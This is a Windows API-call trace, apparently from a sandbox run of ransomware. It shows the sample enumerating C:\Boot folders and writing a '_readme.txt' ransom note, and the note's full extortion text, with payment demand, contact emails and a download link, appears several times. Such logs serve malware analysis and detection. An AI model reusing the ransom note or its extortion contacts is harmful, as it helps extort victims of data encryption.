(HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.724] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*" (normalized: "c:\\boot\\zh-hk\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0188.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0188.724] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0188.724] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0188.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0188.725] PathFindExtensionW (pszPath="C:\\Boot\\zh-HK\\bootmgr.exe.mui") returned=".mui" [0188.725] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0188.727] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0188.727] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0188.727] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0188.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0188.727] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0188.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.727] PathFindFileNameW (pszPath="C:\\Boot\\zh-TW\\") returned="zh-TW\\" [0188.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.727] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0188.728] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0188.728] PathFindFileNameW (pszPath="") returned="" [0188.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.728] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0188.728] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0188.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x2e902a8 [0188.728] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0188.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e776e0 [0188.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.729] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0188.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0188.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x81c) returned 0x2e776e0 [0188.730] PathAppendW (in: pszPath="C:\\Boot\\zh-TW\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 1 [0188.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.731] PathFileExistsW (pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 0 [0188.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e96a68 [0188.731] lstrcpyW (in: lpString1=0x2e96a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0188.731] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0188.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0188.731] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\_readme.txt" (normalized: "c:\\boot\\zh-tw\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0188.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0188.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.733] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*" (normalized: "c:\\boot\\zh-tw\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0188.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.733] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0188.734] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0188.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.734] PathFindExtensionW (pszPath="C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned=".mui" [0188.734] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0188.735] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0188.735] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0188.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0188.736] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0188.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0188.736] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0188.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0188.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0188.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0188.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0188.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0188.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0188.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0188.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0188.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0188.739] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0188.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0188.740] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0188.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0188.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0188.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0188.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0188.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0188.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0188.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0188.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0188.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0188.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0188.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0188.744] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0188.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0188.744] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0188.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0188.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0188.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0188.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0188.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0188.746] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0188.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0188.746] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0188.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0188.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0188.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0188.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0188.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0188.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0188.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0188.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0188.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0188.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0188.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0188.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0188.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0188.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0188.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0188.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 